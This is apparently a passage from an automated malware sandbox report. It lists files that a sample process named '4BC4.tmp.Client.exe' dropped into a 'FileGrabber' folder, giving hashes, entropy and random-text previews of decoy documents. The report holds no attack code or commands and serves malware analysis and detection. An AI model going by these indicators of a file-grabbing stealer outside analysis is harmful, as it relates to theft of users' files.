Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\ProgramData\134349\FileGrabber\Downloads\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\ProgramData\134349\FileGrabber\Downloads\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Downloads\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Downloads\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Downloads\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Downloads\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Downloads\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Downloads\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\ProgramData\134349\FileGrabber\Downloads\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\134349\FileGrabber\Downloads\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\ProgramData\134349\FileGrabber\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
